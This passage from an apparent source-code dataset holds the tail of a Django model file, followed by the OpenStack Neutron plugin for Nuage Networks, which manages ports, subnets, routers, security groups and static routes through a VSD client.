active = models.BooleanField(default=True)
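# Illustrative usage sketch (assumes a configured Django project with these
# models migrated; the names below are hypothetical):
#
#     book = Product.objects.create(
#         name='Example Book', slug='example-book', price='9.99')
#     Product.objects.active()        # only products with active=True
#     book.get_absolute_url()         # resolves 'products:product-detail' by slug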
| 29.390244 | 77 | 0.727801 |
661c77b596aba446c3078ad7fea67435ab0572cc | 62,745 | py | Python | neutron/plugins/nuage/plugin.py | armando-migliaccio/neutron-1 | e31861c15bc73e65a7c22212df2a56f9e45aa0e4 | ["Apache-2.0"] | null | null | null | neutron/plugins/nuage/plugin.py | armando-migliaccio/neutron-1 | e31861c15bc73e65a7c22212df2a56f9e45aa0e4 | ["Apache-2.0"] | null | null | null | neutron/plugins/nuage/plugin.py | armando-migliaccio/neutron-1 | e31861c15bc73e65a7c22212df2a56f9e45aa0e4 | ["Apache-2.0"] | null | null | null |
# Copyright 2014 Alcatel-Lucent USA Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import re
import netaddr
from oslo.config import cfg
from sqlalchemy.orm import exc
from neutron.api import extensions as neutron_extensions
from neutron.api.v2 import attributes
from neutron.common import constants as os_constants
from neutron.common import exceptions as n_exc
from neutron.common import utils
from neutron.db import api as db
from neutron.db import db_base_plugin_v2
from neutron.db import external_net_db
from neutron.db import extraroute_db
from neutron.db import l3_db
from neutron.db import quota_db # noqa
from neutron.db import securitygroups_db as sg_db
from neutron.extensions import external_net
from neutron.extensions import l3
from neutron.extensions import portbindings
from neutron.extensions import providernet as pnet
from neutron.extensions import securitygroup as ext_sg
from neutron.openstack.common import excutils
from neutron.openstack.common import importutils
from neutron.openstack.common import lockutils
from neutron.openstack.common import log as logging
from neutron.openstack.common import loopingcall
from neutron.plugins.nuage.common import config
from neutron.plugins.nuage.common import constants
from neutron.plugins.nuage.common import exceptions as nuage_exc
from neutron.plugins.nuage import extensions
from neutron.plugins.nuage.extensions import netpartition
from neutron.plugins.nuage import nuagedb
from neutron.plugins.nuage import syncmanager
from neutron import policy
LOG = logging.getLogger(__name__)
class NuagePlugin(db_base_plugin_v2.NeutronDbPluginV2,
external_net_db.External_net_db_mixin,
extraroute_db.ExtraRoute_db_mixin,
l3_db.L3_NAT_db_mixin,
netpartition.NetPartitionPluginBase,
sg_db.SecurityGroupDbMixin):
"""Class that implements Nuage Networks' plugin functionality."""
supported_extension_aliases = ["router", "binding", "external-net",
"net-partition", "nuage-router",
"nuage-subnet", "quotas", "provider",
"extraroute", "security-group"]
binding_view = "extension:port_binding:view"
def __init__(self):
super(NuagePlugin, self).__init__()
neutron_extensions.append_api_extensions_path(extensions.__path__)
config.nuage_register_cfg_opts()
self.nuageclient_init()
net_partition = cfg.CONF.RESTPROXY.default_net_partition_name
self._create_default_net_partition(net_partition)
if cfg.CONF.SYNCMANAGER.enable_sync:
self.syncmanager = syncmanager.SyncManager(self.nuageclient)
self._synchronization_thread()
def nuageclient_init(self):
server = cfg.CONF.RESTPROXY.server
serverauth = cfg.CONF.RESTPROXY.serverauth
serverssl = cfg.CONF.RESTPROXY.serverssl
base_uri = cfg.CONF.RESTPROXY.base_uri
auth_resource = cfg.CONF.RESTPROXY.auth_resource
organization = cfg.CONF.RESTPROXY.organization
nuageclient = importutils.import_module('nuagenetlib.nuageclient')
self.nuageclient = nuageclient.NuageClient(server, base_uri,
serverssl, serverauth,
auth_resource,
organization)
def _synchronization_thread(self):
sync_interval = cfg.CONF.SYNCMANAGER.sync_interval
fip_quota = str(cfg.CONF.RESTPROXY.default_floatingip_quota)
if sync_interval > 0:
sync_loop = loopingcall.FixedIntervalLoopingCall(
self.syncmanager.synchronize, fip_quota)
sync_loop.start(interval=sync_interval)
else:
self.syncmanager.synchronize(fip_quota)
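    # _resource_finder resolves a resource referenced in the user request either
    # by UUID (direct lookup) or by name (filtered list lookup); it raises
    # BadRequest when nothing matches or when a name is ambiguous.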
def _resource_finder(self, context, for_resource, resource, user_req):
match = re.match(attributes.UUID_PATTERN, user_req[resource])
if match:
obj_lister = getattr(self, "get_%s" % resource)
found_resource = obj_lister(context, user_req[resource])
if not found_resource:
msg = (_("%(resource)s with id %(resource_id)s does not "
"exist") % {'resource': resource,
'resource_id': user_req[resource]})
raise n_exc.BadRequest(resource=for_resource, msg=msg)
else:
filter = {'name': [user_req[resource]]}
obj_lister = getattr(self, "get_%ss" % resource)
found_resource = obj_lister(context, filters=filter)
if not found_resource:
msg = (_("Either %(resource)s %(req_resource)s not found "
"or you dont have credential to access it")
% {'resource': resource,
'req_resource': user_req[resource]})
raise n_exc.BadRequest(resource=for_resource, msg=msg)
if len(found_resource) > 1:
msg = (_("More than one entry found for %(resource)s "
"%(req_resource)s. Use id instead")
% {'resource': resource,
'req_resource': user_req[resource]})
raise n_exc.BadRequest(resource=for_resource, msg=msg)
found_resource = found_resource[0]
return found_resource
def _create_update_port(self, context, port, np_name):
filters = {'device_id': [port['device_id']]}
ports = self.get_ports(context, filters)
params = {
'port_id': port['id'],
'id': port['device_id'],
'mac': port['mac_address'],
'netpart_name': np_name,
'ip': port['fixed_ips'][0]['ip_address'],
'no_of_ports': len(ports),
'tenant': port['tenant_id'],
'neutron_id': port['fixed_ips'][0]['subnet_id']
}
self.nuageclient.create_vms(params)
def _get_router_by_subnet(self, context, subnet_id):
filters = {
'fixed_ips': {'subnet_id': [subnet_id]},
'device_owner': [os_constants.DEVICE_OWNER_ROUTER_INTF]
}
router_port = self.get_ports(context, filters=filters)
if not router_port:
msg = (_("Router for subnet %s not found ") % subnet_id)
raise n_exc.BadRequest(resource='port', msg=msg)
return router_port[0]['device_id']
def _process_port_create_security_group(self, context, port,
sec_group):
if not attributes.is_attr_set(sec_group):
port[ext_sg.SECURITYGROUPS] = []
return
port_id = port['id']
with context.session.begin(subtransactions=True):
for sg_id in sec_group:
super(NuagePlugin,
self)._create_port_security_group_binding(context,
port_id,
sg_id)
try:
vptag_vport_list = []
for sg_id in sec_group:
params = {
'neutron_port_id': port_id
}
nuage_port = self.nuageclient.get_nuage_port_by_id(params)
if nuage_port and nuage_port.get('nuage_vport_id'):
nuage_vport_id = nuage_port['nuage_vport_id']
sg = self._get_security_group(context, sg_id)
sg_rules = self.get_security_group_rules(
context,
{'security_group_id': [sg_id]})
sg_params = {
'nuage_port': nuage_port,
'sg': sg,
'sg_rules': sg_rules
}
nuage_vptag_id = (
self.nuageclient.process_port_create_security_group(
sg_params))
vptag_vport = {
'nuage_vporttag_id': nuage_vptag_id
}
vptag_vport_list.append(vptag_vport)
if vptag_vport_list:
params = {
'vptag_vport_list': vptag_vport_list,
'nuage_vport_id': nuage_vport_id
}
self.nuageclient.update_nuage_vport(params)
except Exception:
with excutils.save_and_reraise_exception():
for sg_id in sec_group:
super(NuagePlugin,
self)._delete_port_security_group_bindings(context,
port_id)
# Convert to list as a set might be passed here and
# this has to be serialized
port[ext_sg.SECURITYGROUPS] = (list(sec_group) if sec_group else [])
def _delete_port_security_group_bindings(self, context, port_id):
super(NuagePlugin,
self)._delete_port_security_group_bindings(context, port_id)
self.nuageclient.delete_port_security_group_bindings(port_id)
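    # create_port is serialized with an interprocess lock (external=True) so
    # that concurrent creations do not race, e.g. on the per-device port count
    # reported to VSD in _create_update_port.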
@lockutils.synchronized('create_port', 'nuage-port', external=True)
def create_port(self, context, port):
session = context.session
with session.begin(subtransactions=True):
p = port['port']
self._ensure_default_security_group_on_port(context, port)
port = super(NuagePlugin, self).create_port(context, port)
device_owner = port.get('device_owner', None)
if device_owner not in constants.AUTO_CREATE_PORT_OWNERS:
if 'fixed_ips' not in port or len(port['fixed_ips']) == 0:
return self._extend_port_dict_binding(context, port)
subnet_id = port['fixed_ips'][0]['subnet_id']
subnet_mapping = nuagedb.get_subnet_l2dom_by_id(session,
subnet_id)
if subnet_mapping:
port_prefix = constants.NOVA_PORT_OWNER_PREF
if port['device_owner'].startswith(port_prefix):
#This request is coming from nova
try:
net_partition = nuagedb.get_net_partition_by_id(
session,
subnet_mapping['net_partition_id'])
self._create_update_port(
context,
port,
net_partition['name'])
except Exception:
with excutils.save_and_reraise_exception():
super(NuagePlugin, self).delete_port(
context,
port['id'])
if ext_sg.SECURITYGROUPS in p:
self._process_port_create_security_group(
context,
port,
p[ext_sg.SECURITYGROUPS])
return self._extend_port_dict_binding(context, port)
def update_port(self, context, id, port):
p = port['port']
sg_groups = None
if p.get('device_owner', '').startswith(
constants.NOVA_PORT_OWNER_PREF):
session = context.session
with session.begin(subtransactions=True):
port = self._get_port(context, id)
port.update(p)
if not port.get('fixed_ips'):
return self._make_port_dict(port)
subnet_id = port['fixed_ips'][0]['subnet_id']
subnet_mapping = nuagedb.get_subnet_l2dom_by_id(session,
subnet_id)
if not subnet_mapping:
msg = (_("Subnet %s not found on VSD") % subnet_id)
raise n_exc.BadRequest(resource='port', msg=msg)
params = {
'neutron_port_id': id,
}
nuage_port = self.nuageclient.get_nuage_port_by_id(params)
if not nuage_port or not nuage_port.get('nuage_vport_id'):
net_partition = nuagedb.get_net_partition_by_id(
session, subnet_mapping['net_partition_id'])
self._create_update_port(context, port,
net_partition['name'])
self._check_floatingip_update(context, port)
updated_port = self._make_port_dict(port)
sg_port = self._extend_port_dict_security_group(
updated_port,
port
)
sg_groups = sg_port[ext_sg.SECURITYGROUPS]
else:
updated_port = super(NuagePlugin, self).update_port(context, id,
port)
if not updated_port.get('fixed_ips'):
return updated_port
subnet_id = updated_port['fixed_ips'][0]['subnet_id']
subnet_mapping = nuagedb.get_subnet_l2dom_by_id(context.session,
subnet_id)
if subnet_mapping:
if sg_groups:
self._delete_port_security_group_bindings(context,
updated_port['id'])
self._process_port_create_security_group(context,
updated_port,
sg_groups)
elif ext_sg.SECURITYGROUPS in p:
self._delete_port_security_group_bindings(context,
updated_port['id'])
self._process_port_create_security_group(
context,
updated_port,
p[ext_sg.SECURITYGROUPS]
)
return updated_port
def _delete_nuage_vport(self, context, port, np_name):
nuage_vif_id = None
params = {
'neutron_port_id': port['id'],
}
nuage_port = self.nuageclient.get_nuage_port_by_id(params)
if constants.NOVA_PORT_OWNER_PREF in port['device_owner']:
# This was a VM Port
if nuage_port:
nuage_vif_id = nuage_port['nuage_vif_id']
filters = {'device_id': [port['device_id']]}
ports = self.get_ports(context, filters)
params = {
'no_of_ports': len(ports),
'netpart_name': np_name,
'tenant': port['tenant_id'],
'mac': port['mac_address'],
'nuage_vif_id': nuage_vif_id,
'id': port['device_id']
}
self.nuageclient.delete_vms(params)
@lockutils.synchronized('delete-port', 'nuage-del', external=True)
def delete_port(self, context, id, l3_port_check=True):
if l3_port_check:
self.prevent_l3_port_deletion(context, id)
port = self._get_port(context, id)
        # This is required to pass the unit test test_floatingip_port_delete
self.disassociate_floatingips(context, id)
if not port['fixed_ips']:
return super(NuagePlugin, self).delete_port(context, id)
sub_id = port['fixed_ips'][0]['subnet_id']
subnet_mapping = nuagedb.get_subnet_l2dom_by_id(context.session,
sub_id)
if not subnet_mapping:
return super(NuagePlugin, self).delete_port(context, id)
# Need to call this explicitly to delete vport to vporttag binding
if ext_sg.SECURITYGROUPS in port:
self._delete_port_security_group_bindings(context, id)
netpart_id = subnet_mapping['net_partition_id']
net_partition = nuagedb.get_net_partition_by_id(context.session,
netpart_id)
self._delete_nuage_vport(context, port, net_partition['name'])
super(NuagePlugin, self).delete_port(context, id)
def _check_view_auth(self, context, resource, action):
return policy.check(context, action, resource)
def _extend_port_dict_binding(self, context, port):
if self._check_view_auth(context, port, self.binding_view):
port[portbindings.VIF_TYPE] = portbindings.VIF_TYPE_OVS
port[portbindings.VIF_DETAILS] = {
portbindings.CAP_PORT_FILTER: False
}
return port
def get_port(self, context, id, fields=None):
port = super(NuagePlugin, self).get_port(context, id, fields)
return self._fields(self._extend_port_dict_binding(context, port),
fields)
def get_ports(self, context, filters=None, fields=None):
ports = super(NuagePlugin, self).get_ports(context, filters, fields)
return [self._fields(self._extend_port_dict_binding(context, port),
fields) for port in ports]
def _check_router_subnet_for_tenant(self, context, tenant_id):
# Search router and subnet tables.
# If no entry left delete user and group from VSD
filters = {'tenant_id': [tenant_id]}
routers = self.get_routers(context, filters=filters)
subnets = self.get_subnets(context, filters=filters)
return bool(routers or subnets)
def _extend_network_dict_provider(self, context, network):
binding = nuagedb.get_network_binding(context.session, network['id'])
if binding:
network[pnet.NETWORK_TYPE] = binding.network_type
network[pnet.PHYSICAL_NETWORK] = binding.physical_network
network[pnet.SEGMENTATION_ID] = binding.vlan_id
def _process_provider_create(self, context, attrs):
network_type = attrs.get(pnet.NETWORK_TYPE)
physical_network = attrs.get(pnet.PHYSICAL_NETWORK)
segmentation_id = attrs.get(pnet.SEGMENTATION_ID)
network_type_set = attributes.is_attr_set(network_type)
physical_network_set = attributes.is_attr_set(physical_network)
segmentation_id_set = attributes.is_attr_set(segmentation_id)
if not (network_type_set or physical_network_set or
segmentation_id_set):
return None, None, None
if not network_type_set:
msg = _("provider:network_type required")
raise n_exc.InvalidInput(error_message=msg)
elif network_type != 'vlan':
msg = (_("provider:network_type %s not supported in VSP")
% network_type)
raise nuage_exc.NuageBadRequest(msg=msg)
if not physical_network_set:
msg = _("provider:physical_network required")
raise nuage_exc.NuageBadRequest(msg=msg)
if not segmentation_id_set:
msg = _("provider:segmentation_id required")
raise nuage_exc.NuageBadRequest(msg=msg)
self.nuageclient.validate_provider_network(network_type,
physical_network,
segmentation_id)
return network_type, physical_network, segmentation_id
def create_network(self, context, network):
(network_type, physical_network,
vlan_id) = self._process_provider_create(context,
network['network'])
with context.session.begin(subtransactions=True):
self._ensure_default_security_group(
context,
network['network']['tenant_id']
)
net = super(NuagePlugin, self).create_network(context,
network)
self._process_l3_create(context, net, network['network'])
if network_type == 'vlan':
nuagedb.add_network_binding(context.session, net['id'],
network_type,
physical_network, vlan_id)
self._extend_network_dict_provider(context, net)
return net
def _validate_update_network(self, context, id, network):
req_data = network['network']
is_external_set = req_data.get(external_net.EXTERNAL)
if not attributes.is_attr_set(is_external_set):
return (None, None)
neutron_net = self.get_network(context, id)
if neutron_net.get(external_net.EXTERNAL) == is_external_set:
return (None, None)
subnet = self._validate_nuage_sharedresource(context, 'network', id)
if subnet and not is_external_set:
msg = _('External network with subnets can not be '
'changed to non-external network')
raise nuage_exc.OperationNotSupported(msg=msg)
if is_external_set:
# Check if there are vm ports attached to this network
# If there are, then updating the network is not allowed
ports = self.get_ports(context, filters={'network_id': [id]})
for p in ports:
if p['device_owner'].startswith(
constants.NOVA_PORT_OWNER_PREF):
raise n_exc.NetworkInUse(net_id=id)
return (is_external_set, subnet)
def get_network(self, context, net_id, fields=None):
net = super(NuagePlugin, self).get_network(context,
net_id,
None)
self._extend_network_dict_provider(context, net)
return self._fields(net, fields)
def get_networks(self, context, filters=None, fields=None,
sorts=None, limit=None, marker=None, page_reverse=False):
nets = super(NuagePlugin,
self).get_networks(context, filters, None, sorts,
limit, marker, page_reverse)
for net in nets:
self._extend_network_dict_provider(context, net)
return [self._fields(net, fields) for net in nets]
def update_network(self, context, id, network):
pnet._raise_if_updates_provider_attributes(network['network'])
with context.session.begin(subtransactions=True):
is_external_set, subnet = self._validate_update_network(context,
id,
network)
net = super(NuagePlugin, self).update_network(context, id,
network)
self._process_l3_update(context, net, network['network'])
if subnet and is_external_set:
subn = subnet[0]
subnet_l2dom = nuagedb.get_subnet_l2dom_by_id(context.session,
subn['id'])
if subnet_l2dom:
user_id = subnet_l2dom['nuage_user_id']
group_id = subnet_l2dom['nuage_group_id']
self.nuageclient.delete_subnet(subn['id'])
nuagedb.delete_subnetl2dom_mapping(context.session,
subnet_l2dom)
if not self._check_router_subnet_for_tenant(
context, subn['tenant_id']):
self.nuageclient.delete_user(user_id)
self.nuageclient.delete_group(group_id)
self._add_nuage_sharedresource(subnet[0],
id,
constants.SR_TYPE_FLOATING)
return net
def delete_network(self, context, id):
with context.session.begin(subtransactions=True):
self._process_l3_delete(context, id)
filter = {'network_id': [id]}
subnets = self.get_subnets(context, filters=filter)
for subnet in subnets:
self.delete_subnet(context, subnet['id'])
super(NuagePlugin, self).delete_network(context, id)
def _get_net_partition_for_subnet(self, context, subnet):
ent = subnet.get('net_partition', None)
if not ent:
def_net_part = cfg.CONF.RESTPROXY.default_net_partition_name
net_partition = nuagedb.get_net_partition_by_name(context.session,
def_net_part)
else:
net_partition = self._resource_finder(context, 'subnet',
'net_partition', subnet)
if not net_partition:
msg = _('Either net_partition is not provided with subnet OR '
'default net_partition is not created at the start')
raise n_exc.BadRequest(resource='subnet', msg=msg)
return net_partition
@staticmethod
def _validate_create_subnet(subnet):
if (attributes.is_attr_set(subnet['gateway_ip'])
and netaddr.IPAddress(subnet['gateway_ip'])
not in netaddr.IPNetwork(subnet['cidr'])):
msg = "Gateway IP outside of the subnet CIDR "
raise nuage_exc.NuageBadRequest(msg=msg)
def _validate_create_provider_subnet(self, context, net_id):
net_filter = {'network_id': [net_id]}
existing_subn = self.get_subnets(context, filters=net_filter)
if len(existing_subn) > 0:
msg = _('Only one subnet is allowed per '
'Provider network %s') % net_id
raise nuage_exc.OperationNotSupported(msg=msg)
def _delete_nuage_sharedresource(self, net_id):
self.nuageclient.delete_nuage_sharedresource(net_id)
def _validate_nuage_sharedresource(self, context, resource, net_id):
filter = {'network_id': [net_id]}
existing_subn = self.get_subnets(context, filters=filter)
if len(existing_subn) > 1:
msg = _('Only one subnet is allowed per '
'external network %s') % net_id
raise nuage_exc.OperationNotSupported(msg=msg)
return existing_subn
def _add_nuage_sharedresource(self, subnet, net_id, type):
net = netaddr.IPNetwork(subnet['cidr'])
params = {
'neutron_subnet': subnet,
'net': net,
'type': type,
'net_id': net_id
}
self.nuageclient.create_nuage_sharedresource(params)
def _create_nuage_sharedresource(self, context, subnet, type):
subn = subnet['subnet']
net_id = subn['network_id']
self._validate_nuage_sharedresource(context, 'subnet', net_id)
with context.session.begin(subtransactions=True):
subn = super(NuagePlugin, self).create_subnet(context, subnet)
self._add_nuage_sharedresource(subn, net_id, type)
return subn
def _create_port_gateway(self, context, subnet, gw_ip=None):
if gw_ip is not None:
fixed_ip = [{'ip_address': gw_ip, 'subnet_id': subnet['id']}]
else:
fixed_ip = [{'subnet_id': subnet['id']}]
port_dict = dict(port=dict(
name='',
device_id='',
admin_state_up=True,
network_id=subnet['network_id'],
tenant_id=subnet['tenant_id'],
fixed_ips=fixed_ip,
mac_address=attributes.ATTR_NOT_SPECIFIED,
device_owner=os_constants.DEVICE_OWNER_DHCP))
port = super(NuagePlugin, self).create_port(context, port_dict)
return port
def _delete_port_gateway(self, context, ports):
for port in ports:
super(NuagePlugin, self).delete_port(context, port['id'])
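    # _create_nuage_subnet reserves a DHCP port on the last address of the
    # subnet's allocation pool and hands that address to VSD as dhcp_ip; if the
    # VSD call fails, both the gateway port and the neutron subnet are rolled
    # back.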
def _create_nuage_subnet(self, context, neutron_subnet, netpart_id,
l2dom_template_id, pnet_binding):
net = netaddr.IPNetwork(neutron_subnet['cidr'])
# list(net)[-1] is the broadcast
last_address = neutron_subnet['allocation_pools'][-1]['end']
gw_port = self._create_port_gateway(context, neutron_subnet,
last_address)
params = {
'netpart_id': netpart_id,
'tenant_id': neutron_subnet['tenant_id'],
'net': net,
'l2dom_tmplt_id': l2dom_template_id,
'pnet_binding': pnet_binding,
'dhcp_ip': gw_port['fixed_ips'][0]['ip_address']
}
try:
nuage_subnet = self.nuageclient.create_subnet(neutron_subnet,
params)
except Exception:
with excutils.save_and_reraise_exception():
self._delete_port_gateway(context, [gw_port])
super(NuagePlugin, self).delete_subnet(context,
neutron_subnet['id'])
if nuage_subnet:
l2dom_id = str(nuage_subnet['nuage_l2template_id'])
user_id = nuage_subnet['nuage_userid']
group_id = nuage_subnet['nuage_groupid']
id = nuage_subnet['nuage_l2domain_id']
with context.session.begin(subtransactions=True):
nuagedb.add_subnetl2dom_mapping(context.session,
neutron_subnet['id'],
id,
netpart_id,
l2dom_id=l2dom_id,
nuage_user_id=user_id,
nuage_group_id=group_id)
def create_subnet(self, context, subnet):
subn = subnet['subnet']
net_id = subn['network_id']
if self._network_is_external(context, net_id):
return self._create_nuage_sharedresource(
context, subnet, constants.SR_TYPE_FLOATING)
pnet_binding = nuagedb.get_network_binding(context.session, net_id)
if pnet_binding:
self._validate_create_provider_subnet(context, net_id)
self._validate_create_subnet(subn)
net_partition = self._get_net_partition_for_subnet(context, subn)
neutron_subnet = super(NuagePlugin, self).create_subnet(context,
subnet)
self._create_nuage_subnet(context, neutron_subnet, net_partition['id'],
subn['nuage_subnet_template'],
pnet_binding)
return neutron_subnet
def update_subnet(self, context, id, subnet):
subn = copy.deepcopy(subnet['subnet'])
subnet_l2dom = nuagedb.get_subnet_l2dom_by_id(context.session,
id)
params = {
'parent_id': subnet_l2dom['nuage_subnet_id'],
'type': subnet_l2dom['nuage_l2dom_tmplt_id']
}
with context.session.begin(subtransactions=True):
neutron_subnet = super(NuagePlugin, self).update_subnet(context,
id, subnet)
self.nuageclient.update_subnet(subn, params)
return neutron_subnet
def delete_subnet(self, context, id):
subnet = self.get_subnet(context, id)
if self._network_is_external(context, subnet['network_id']):
super(NuagePlugin, self).delete_subnet(context, id)
return self._delete_nuage_sharedresource(id)
subnet_l2dom = nuagedb.get_subnet_l2dom_by_id(context.session, id)
if subnet_l2dom:
try:
self.nuageclient.delete_subnet(id)
except Exception:
                msg = (_('Unable to complete operation on subnet %s. '
                         'One or more ports have an IP allocation '
                         'from this subnet.') % id)
raise n_exc.BadRequest(resource='subnet', msg=msg)
super(NuagePlugin, self).delete_subnet(context, id)
if subnet_l2dom and not self._check_router_subnet_for_tenant(
context, subnet['tenant_id']):
self.nuageclient.delete_user(subnet_l2dom['nuage_user_id'])
self.nuageclient.delete_group(subnet_l2dom['nuage_group_id'])
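    # Attaching a subnet to a router deletes its Nuage L2 domain and recreates
    # it as a domain subnet under the router's zone on VSD; the subnet/l2domain
    # mapping row is updated to reflect the move.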
def add_router_interface(self, context, router_id, interface_info):
session = context.session
with session.begin(subtransactions=True):
rtr_if_info = super(NuagePlugin,
self).add_router_interface(context,
router_id,
interface_info)
subnet_id = rtr_if_info['subnet_id']
subn = self.get_subnet(context, subnet_id)
ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_rtrid(session,
router_id)
nuage_zone = self.nuageclient.get_zone_by_routerid(router_id)
if not nuage_zone or not ent_rtr_mapping:
super(NuagePlugin,
self).remove_router_interface(context,
router_id,
interface_info)
msg = (_("Router %s does not hold default zone OR "
"domain in VSD. Router-IF add failed")
% router_id)
raise n_exc.BadRequest(resource='router', msg=msg)
subnet_l2dom = nuagedb.get_subnet_l2dom_by_id(session,
subnet_id)
if not subnet_l2dom:
super(NuagePlugin,
self).remove_router_interface(context,
router_id,
interface_info)
msg = (_("Subnet %s does not hold Nuage VSD reference. "
"Router-IF add failed") % subnet_id)
raise n_exc.BadRequest(resource='subnet', msg=msg)
if (subnet_l2dom['net_partition_id'] !=
ent_rtr_mapping['net_partition_id']):
super(NuagePlugin,
self).remove_router_interface(context,
router_id,
interface_info)
msg = (_("Subnet %(subnet)s and Router %(router)s belong to "
"different net_partition Router-IF add "
"not permitted") % {'subnet': subnet_id,
'router': router_id})
raise n_exc.BadRequest(resource='subnet', msg=msg)
nuage_subnet_id = subnet_l2dom['nuage_subnet_id']
if self.nuageclient.vms_on_l2domain(nuage_subnet_id):
super(NuagePlugin,
self).remove_router_interface(context,
router_id,
interface_info)
msg = (_("Subnet %s has one or more active VMs "
"Router-IF add not permitted") % subnet_id)
raise n_exc.BadRequest(resource='subnet', msg=msg)
self.nuageclient.delete_subnet(subnet_id)
net = netaddr.IPNetwork(subn['cidr'])
pnet_binding = nuagedb.get_network_binding(context.session,
subn['network_id'])
params = {
'net': net,
'zone_id': nuage_zone['nuage_zone_id'],
'neutron_subnet_id': subnet_id,
'pnet_binding': pnet_binding
}
if not attributes.is_attr_set(subn['gateway_ip']):
subn['gateway_ip'] = str(netaddr.IPAddress(net.first + 1))
try:
nuage_subnet = self.nuageclient.create_domain_subnet(subn,
params)
except Exception:
with excutils.save_and_reraise_exception():
super(NuagePlugin,
self).remove_router_interface(context,
router_id,
interface_info)
if nuage_subnet:
ns_dict = {}
ns_dict['nuage_subnet_id'] = nuage_subnet['nuage_subnetid']
ns_dict['nuage_l2dom_tmplt_id'] = None
nuagedb.update_subnetl2dom_mapping(subnet_l2dom,
ns_dict)
return rtr_if_info
def remove_router_interface(self, context, router_id, interface_info):
if 'subnet_id' in interface_info:
subnet_id = interface_info['subnet_id']
subnet = self.get_subnet(context, subnet_id)
found = False
try:
filters = {'device_id': [router_id],
'device_owner':
[os_constants.DEVICE_OWNER_ROUTER_INTF],
'network_id': [subnet['network_id']]}
ports = self.get_ports(context, filters)
for p in ports:
if p['fixed_ips'][0]['subnet_id'] == subnet_id:
found = True
break
except exc.NoResultFound:
msg = (_("No router interface found for Router %s. "
"Router-IF delete failed") % router_id)
raise n_exc.BadRequest(resource='router', msg=msg)
if not found:
msg = (_("No router interface found for Router %s. "
"Router-IF delete failed") % router_id)
raise n_exc.BadRequest(resource='router', msg=msg)
elif 'port_id' in interface_info:
port_db = self._get_port(context, interface_info['port_id'])
if not port_db:
msg = (_("No router interface found for Router %s. "
"Router-IF delete failed") % router_id)
raise n_exc.BadRequest(resource='router', msg=msg)
subnet_id = port_db['fixed_ips'][0]['subnet_id']
session = context.session
with session.begin(subtransactions=True):
subnet_l2dom = nuagedb.get_subnet_l2dom_by_id(session,
subnet_id)
if not subnet_l2dom:
return super(NuagePlugin,
self).remove_router_interface(context,
router_id,
interface_info)
nuage_subn_id = subnet_l2dom['nuage_subnet_id']
if self.nuageclient.vms_on_subnet(nuage_subn_id):
msg = (_("Subnet %s has one or more active VMs "
"Router-IF delete not permitted") % subnet_id)
raise n_exc.BadRequest(resource='subnet', msg=msg)
neutron_subnet = self.get_subnet(context, subnet_id)
ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_rtrid(
context.session,
router_id)
if not ent_rtr_mapping:
msg = (_("Router %s does not hold net_partition "
"assoc on Nuage VSD. Router-IF delete failed")
% router_id)
raise n_exc.BadRequest(resource='router', msg=msg)
net = netaddr.IPNetwork(neutron_subnet['cidr'])
netpart_id = ent_rtr_mapping['net_partition_id']
pnet_binding = nuagedb.get_network_binding(
context.session, neutron_subnet['network_id'])
params = {
'tenant_id': neutron_subnet['tenant_id'],
'net': net,
'netpart_id': netpart_id,
'nuage_subn_id': nuage_subn_id,
'neutron_subnet': neutron_subnet,
'pnet_binding': pnet_binding
}
nuage_subnet = self.nuageclient.remove_router_interface(params)
info = super(NuagePlugin,
self).remove_router_interface(context, router_id,
interface_info)
if nuage_subnet:
tmplt_id = str(nuage_subnet['nuage_l2template_id'])
ns_dict = {}
ns_dict['nuage_subnet_id'] = nuage_subnet['nuage_l2domain_id']
ns_dict['nuage_l2dom_tmplt_id'] = tmplt_id
nuagedb.update_subnetl2dom_mapping(subnet_l2dom,
ns_dict)
return info
def _get_net_partition_for_router(self, context, rtr):
ent = rtr.get('net_partition', None)
if not ent:
def_net_part = cfg.CONF.RESTPROXY.default_net_partition_name
net_partition = nuagedb.get_net_partition_by_name(context.session,
def_net_part)
else:
net_partition = self._resource_finder(context, 'router',
'net_partition', rtr)
if not net_partition:
msg = _("Either net_partition is not provided with router OR "
"default net_partition is not created at the start")
raise n_exc.BadRequest(resource='router', msg=msg)
return net_partition
def create_router(self, context, router):
net_partition = self._get_net_partition_for_router(context, router)
neutron_router = super(NuagePlugin, self).create_router(context,
router)
params = {
'net_partition': net_partition,
'tenant_id': neutron_router['tenant_id']
}
try:
nuage_router = self.nuageclient.create_router(neutron_router,
router['router'],
params)
except Exception:
with excutils.save_and_reraise_exception():
super(NuagePlugin, self).delete_router(context,
neutron_router['id'])
if nuage_router:
with context.session.begin(subtransactions=True):
nuagedb.add_entrouter_mapping(context.session,
net_partition['id'],
neutron_router['id'],
nuage_router['nuage_domain_id'])
return neutron_router
def _validate_nuage_staticroutes(self, old_routes, added, removed):
cidrs = []
for old in old_routes:
if old not in removed:
ip = netaddr.IPNetwork(old['destination'])
cidrs.append(ip)
for route in added:
ip = netaddr.IPNetwork(route['destination'])
matching = netaddr.all_matching_cidrs(ip.ip, cidrs)
if matching:
                msg = _('Multiple static routes to the same '
                        'subnet are not allowed')
raise n_exc.BadRequest(resource='router', msg=msg)
cidrs.append(ip)
def update_router(self, context, id, router):
r = router['router']
with context.session.begin(subtransactions=True):
if 'routes' in r:
old_routes = self._get_extra_routes_by_router_id(context,
id)
added, removed = utils.diff_list_of_dict(old_routes,
r['routes'])
self._validate_nuage_staticroutes(old_routes, added, removed)
ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_rtrid(
context.session, id)
if not ent_rtr_mapping:
msg = (_("Router %s does not hold net-partition "
"assoc on VSD. extra-route failed") % id)
raise n_exc.BadRequest(resource='router', msg=msg)
# Let it do internal checks first and verify it.
router_updated = super(NuagePlugin,
self).update_router(context,
id,
router)
for route in removed:
destaddr = route['destination']
cidr = destaddr.split('/')
params = {
"address": cidr[0],
"nexthop": route['nexthop'],
"nuage_domain_id": ent_rtr_mapping['nuage_router_id']
}
self.nuageclient.delete_nuage_staticroute(params)
for route in added:
params = {
'parent_id': ent_rtr_mapping['nuage_router_id'],
'net': netaddr.IPNetwork(route['destination']),
'nexthop': route['nexthop']
}
self.nuageclient.create_nuage_staticroute(
params)
